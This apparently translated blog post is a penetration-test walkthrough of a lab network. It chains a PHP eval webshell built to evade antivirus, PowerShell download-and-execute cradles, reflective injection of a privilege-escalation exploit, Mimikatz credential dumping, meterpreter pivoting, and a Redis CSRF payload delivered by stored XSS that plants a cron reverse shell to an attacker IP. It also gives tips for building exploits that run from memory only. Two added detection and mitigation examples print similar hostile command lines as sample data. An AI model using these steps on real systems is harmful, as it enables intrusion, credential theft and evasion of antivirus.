Fileless penetration test

Acrobatics with a 60-byte webshell

The other day I read an article, "Hundreds of banks and financial institutions around the world are infected with 'fileless' malware that is almost impossible to detect".
PowerShell struck me as remarkable, so I wanted to experiment with it myself and reproduce the fileless attack pattern as faithfully as possible.

Topology design


Topology introduction:

  • 192.168.1.0/24 simulates the external network environment.
  • 172.21.132.0/24 simulates the enterprise internal network environment.
  • The border web server has two NICs (external: 192.168.1.110, internal: 172.21.132.110). To ensure the most basic security, a firewall is set up on the border web server: it opens only ports 80, 81 and 443 to the outside world and opens all ports to the internal network. Anti-virus software is also installed on it.
  • The internal network also contains several web servers and an out-of-band alerting device (IPS). They can all connect to the external network, but the external network cannot access any of the internal web servers.
  • One Linux web server (172.21.132.113) has a firewall in front of it: the other web servers on the internal network cannot access it, but it can access the other internal servers and can connect to the external network. In this environment, 192.168.1.108 is the attacker's Kali machine and 192.168.1.212 is the attacker's Windows machine.

Introduction to nishang and PowerSploit

  1. Nishang is a PowerShell tool built specifically for penetration testing. It bundles a framework, scripts and various payloads. The author wrote the scripts during real penetration tests, so they have practical value. They include download-and-execute, keylogging, DNS, delayed-command and other scripts.
  2. PowerSploit is another post-exploitation toolset. "Post exploitation" is a term from foreign penetration-testing standards: it covers what you do after getting a shell. PowerSploit is really a collection of PowerShell scripts, including Inject-Dll (inject a DLL into a specified process), Inject-Shellcode (inject shellcode into a running process), Encrypt-Script (encrypt text or a script), Get-GPPPassword (recover plaintext passwords from groups.xml) and Invoke-ReverseDnsLookup (scan DNS PTR records).

Penetration begins

First, a FastCGI misconfiguration on the border web server allows a webshell to be planted on it.
Because many of the "knife" clients circulating online are backdoored, I use the open-source CKnife (see: "Cross-platform version of the China knife, Cknife, released"; project address: Cknife GitHub).
Because the server runs anti-virus software, I use a modified one-line Trojan.
The bypass idea comes from: "The advanced method of the dog-beating stick: modifying the Cknife configuration to get past Security Dog in seconds".

The server-side Trojan I use:

<?php

eval('$ms509 ='.$_POST['Cknife']);

eval($ms509);

?>

In Config.ini, replace PHP_MAKE with:

base64_decode($_POST['action']);

Connection mode

With the webshell in place, first use systeminfo to view the system information.

This shows a 64-bit Windows Server 2008 R2 system with no system patches installed.
So I can bounce a PowerShell session out of it for further penetration.
First, git clone nishang into your web directory; Invoke-PowerShellTcp.ps1 is in the Shells directory. For convenience I copied Invoke-PowerShellTcp.ps1 to the web root. I use NC to listen on port 8888 on my own machine, and then execute:

powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.108/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1.108 -port 8888

NC receives the reverse PowerShell session.

Checking the privileges shows they are fairly low: only IIS apppool\defaultapppool.
So I need to escalate privileges.
The usual approach is to upload a kernel exploit, typically as an exe. Here, however, I load the exe remotely straight into the memory of the victim host and execute it there; I describe this in detail in "the fun of penetration (a)". First, I download
https://github.com/clymb3r/PowerShell/blob/master/Invoke-ReflectivePEInjection/Invoke-ReflectivePEInjection.ps1
into my web directory, and place the exploit (ms1564.exe) in the web root as well.
Then, in the reverse shell, run:

IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.108/Invoke-ReflectivePEInjection.ps1');Invoke-ReflectivePEInjection -PEUrl http://192.168.1.108/ms1564.exe -ExeArgs "cmd" -ForceASLR

Now run whoami to check the privileges:
nt authority\system

(PS: there is a pitfall here. The ms15051 exploit was simply downloaded from the internet and used without modification, so when the command passed to it as an argument contains spaces it does nothing and gives no output. When I had it execute cmd, the shell was elevated without problems, but if you have it execute powershell, the reverse shell hangs.)
Next, collect information on this machine.
First, use mimikatz to get the passwords of users who have logged on:

IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.108/Invoke-Mimikatz.ps1');Invoke-Mimikatz

View the ARP table.

Many machines are in the 172.21.132.100-120 range.
I call PowerShell to scan them.

The port-scan script can be downloaded from here: https://github.com/samratashok/nishang/blob/master/Scan/Invoke-PortScan.ps1

Scan:

IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.108/Invoke-PortScan.ps1');Invoke-PortScan -StartAddress 172.21.132.0 -EndAddress 172.21.132.254 -ResolveHost -ScanPort

Next I use PowerShell to bounce back a meterpreter session.
This uses the PowerSploit framework. For some reason the author removed the part that supports the MSF framework, but after some searching I found, in the author's commit history, the last version that still supports MSF.
The address is: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/12ce71b9f4b0428d9425e001e5988f91eb2b8b87/CodeExecution/Invoke-Shellcode.ps1
If you git clone the new version of PowerSploit, replace the new version's CodeExecution/Invoke-Shellcode.ps1 with this old version of the file.
First, download the script to the attacker's own web directory. For convenience, I wrote a calling script and placed it in the web directory (1.ps1):

IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.108/CodeExecution/Invoke-Shellcode.ps1')
Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.1.108 -lport 4444 -force

Open MSF first, set the payload to windows/meterpreter/reverse_https, and listen on port 4444:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf exploit(handler) > run

Then, in the reverse PowerShell shell, call:

IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.108/1.ps1')

This successfully yields a meterpreter session. Note: running shell in this meterpreter does not give an interactive cmd.
Because the exploit had already elevated the reverse PowerShell shell to SYSTEM, the meterpreter session also comes back with SYSTEM privileges.
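
Every stage so far is fetched and run by a PowerShell download cradle launched from the web server's process tree, and both facts are visible in process-creation records. The following detection sketch is an added example, not code from the original post; the record layout, the process tree and the names `classify` and `scan` are assumptions, and the sample records are constructed.

```python
import re

WEB_PARENTS = {"w3wp.exe", "php-cgi.exe"}   # assumed web worker process names
SHELLS = {"cmd.exe", "powershell.exe"}
EXEC_RE = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
FETCH_RE = re.compile(r"\.download(?:string|data)\s*\(\s*['\"]([^'\"]+)['\"]", re.I)

# Constructed process-creation records (fields as in event 4688 with
# command-line auditing enabled); the process tree is an assumption.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\php\php-cgi.exe", "cmdline": "php-cgi.exe"},
    {"parent": r"C:\php\php-cgi.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c powershell IEX (New-Object Net.WebClient)"
                ".DownloadString('http://192.168.1.108/1.ps1')"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Get-ChildItem C:\\inetpub"},
]

def basename(path):
    """Lower-cased file name of a Windows or POSIX style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the list of findings for one process-creation record."""
    findings = []
    if basename(event["parent"]) in WEB_PARENTS and basename(event["image"]) in SHELLS:
        findings.append("web server process spawned a shell")
    fetch = FETCH_RE.search(event["cmdline"])
    # A fetch call combined with IEX means the script runs from memory only.
    if fetch and EXEC_RE.search(event["cmdline"]):
        findings.append("in-memory download cradle: " + fetch.group(1))
    return findings

def scan(events):
    """Return (image, finding) pairs for every record that matches a rule."""
    return [(basename(e["image"]), f) for e in events for f in classify(e)]

if __name__ == "__main__":
    for image, finding in scan(SAMPLE_EVENTS):
        print(image, "->", finding)
```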

Next, in meterpreter, view the routes:
run get_local_subnets

Find the information saved by PuTTY:
run enum_putty

Find the passwords saved by IE:
run post/windows/gather/enum_ie

That is about enough local information gathering.
Put meterpreter in the background:
background

Then add a route (so that the internal network can be scanned):
route add 172.21.132.0 255.255.255.0 1
For route add, the first argument is the address, the second is the netmask, and the third is the session ID.

Scan for hosts on the internal network, using SMB for host identification:
use auxiliary/scanner/smb/smb_version

Try the administrator password just found against the internal network to see how many hosts use the same password:
use auxiliary/scanner/smb/smb_login

You can see that most machines on the intranet use the same password.

Next I want to use a SOCKS proxy to get into the internal network and gather some information.

There are three options:
First: MSF provides a socks4a proxy. A browser can use it to reach the internal network, but Burp cannot use a socks4a proxy.
Second: reGeorgSocksProxy.py can be used to get a SOCKS5 proxy into the internal network.
Third: a specially processed xsocks.exe can be loaded remotely into memory through PowerShell and run as a SOCKS5 proxy.

Because this is about acrobatics with a 60-byte webshell, I use the third method to enter the internal network.

First, put the specially processed xsocks.exe in the attacker's web directory, then load it with PowerShell:

IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.108/Invoke-ReflectivePEInjection.ps1');Invoke-ReflectivePEInjection -PEUrl http://192.168.1.108/xsocks.exe -ExeArgs "-l 443" -ForceASLR

Then configure Burp:

Configure Firefox like this:

This produces the following result:

Look at the effect:

Intercepted traffic can also be sent to Repeater.

  • Background on Redis unauthorized access
    For a detailed article, see "redis Unauthorized access summary".
    The Redis CSRF vulnerability exists because, when invalid commands are sent to Redis, Redis itself does not terminate the TCP connection. Redis simply executes the valid commands in the body and ignores the contents of the HTTP header.
  • Background on CSRF: cross-site request forgery, also known as one click attack or session riding, abbreviated CSRF/XSRF. Put simply, the attacker steals your identity and sends malicious requests in your name. What CSRF can do includes: sending mail in your name, sending messages, stealing your account, even buying goods or transferring virtual currency. The resulting problems include leaks of personal privacy and loss of property. The classic CSRF case is modifying the DNS configuration of your home router through CSRF for illegal profit; see the article "TP-link TL-WR840N Series Router CSRF vulnerability exists, you can modify any configuration (including POC test process)".
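
The behaviour described above, and the server-side fix for it, can be modelled in a few lines. This is an added example, not code from the original post: a toy model of Redis reading inline commands, run first as the text describes and then with the protection present in Redis 3.2.7 and later, which treats `POST` and `Host:` as commands that drop the client. The function `serve`, its flag `abort_on_http` and the constructed requests (with a harmless `SET` as the body) are assumptions.

```python
KNOWN_COMMANDS = {"set", "get", "config", "save", "flushall", "eval"}

# Constructed requests, shaped like what a browser sends for an XHR with a
# text body; the body here is a harmless SET.
BODY = b"SET demo 1\r\n"
HEADERS = (b" / HTTP/1.1\r\n"
           b"Host: 127.0.0.1:6379\r\n"
           b"Content-Type: text/plain;charset=UTF-8\r\n"
           b"Content-Length: 12\r\n\r\n")
POST_REQUEST = b"POST" + HEADERS + BODY
PUT_REQUEST = b"PUT" + HEADERS + BODY   # edge case: method other than POST

def serve(stream, abort_on_http):
    """Toy model of Redis reading inline commands from one TCP stream."""
    result = {"executed": [], "errors": 0, "closed": False}
    for line in stream.split(b"\r\n"):
        words = line.split()
        if not words:
            continue                      # blank line between headers and body
        name = words[0].decode("latin-1").lower()
        if abort_on_http and name in ("post", "host:"):
            result["closed"] = True       # warn in the log and drop the client
            break
        if name in KNOWN_COMMANDS:
            result["executed"].append(name)
        else:
            result["errors"] += 1         # "-ERR unknown command", keep reading
    return result

if __name__ == "__main__":
    print("no protection  :", serve(POST_REQUEST, abort_on_http=False))
    print("with protection:", serve(POST_REQUEST, abort_on_http=True))
    print("PUT, protected :", serve(PUT_REQUEST, abort_on_http=True))
```

Requiring authentication with `requirepass` is a second layer: an unauthenticated command in the body is then rejected even on a server without this check.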

After probing the internal network, I found that 172.21.132.113 has port 6379 open, but it cannot be reached through the proxy.
Later I found a message board at 172.21.132.117:83/xss/add.php.

So, following the article "Client-Side Redis Attack Proof of Concept",
I wrote a JS file that accesses Redis and yields a reverse shell:

      var cmd = new XMLHttpRequest();
      cmd.open("POST", "http://127.0.0.1:6379");
      cmd.send('flushall\r\n');

      var cmd = new XMLHttpRequest();
      cmd.open("POST", "http://127.0.0.1:6379");
      cmd.send('eval \'' + 'redis.call(\"set\", \"1\",\"\\n\\n*/1 * * * * /bin/bash -i >& /dev/tcp/192.168.1.108/5566 0>&1\\n\\n"); redis.call(\"config\", \"set\", \"dir\", \"/var/spool/cron/\"); redis.call(\"config\", \"set\", \"dbfilename\", \"root\");' + '\' 0' + "\r\n");

      var cmd = new XMLHttpRequest();
      cmd.open("POST", "http://127.0.0.1:6379");
      cmd.send('save\r\n');

Put it in my web directory, and then write this on the message board:

<script src=http://192.168.1.108/redis.js></script>

On my machine I use NC to listen on port 5566. As soon as an administrator whose computer has Redis installed views the message board, a shell pops back to my host.

You can see that the shell that came back has root privileges.

At this point, the entire network has been fully penetrated.

Final tips:

As described above, PowerShell loads an external exe into memory and executes it, which leaves no trace on the victim host and also bypasses the mainstream domestic anti-virus products.
The idea is based on these articles:
PowerPwning: Post-Exploiting By Overpowering PowerShell
Also: Powershell tricks: Code Execution & Process Injection

The prerequisites for making this work:
1. You have the source code
2. The source must be written in C++; anything written in C# crashes
3. Compiling with VS2010 + WinXP is recommended
4. GCC cannot be used to compile the Windows binary
5. Compile with /MT or /MTd
6. If you want to pass parameters, change int main(int argc, char **argv) to:

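#include <windows.h>
#include <shellapi.h>   /* CommandLineToArgvW (link with Shell32.lib) */
#include <stdio.h>

int main()
{
    LPWSTR *szArglist;
    int nArgs;
    int i;
    /* Parse the process command line directly instead of using argc/argv */
    szArglist = CommandLineToArgvW(GetCommandLineW(), &nArgs);
    if( NULL == szArglist )
    {
        wprintf(L"CommandLineToArgvW failed\n");
        return 0;
    }
    /* …………………… (szArglist[i] takes the place of argv[i], for i < nArgs) */
    LocalFree(szArglist);   /* release the array allocated by CommandLineToArgvW */
    return 0;
}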

7. The program must not perform any file-write operations

Here is the compilation process for the MS15-051 exploit

I use the source code of the MS15-051 privilege-escalation tool for the experiment

Add the code to pass parameters

There are several character-conversion problems, which you can solve yourself.
Once it is built, look at the effect.
First, upload the generated ms15-051.exe to your web server

Download it locally to see what effect it has

Then load the compiled ms15-051.exe with PowerShell





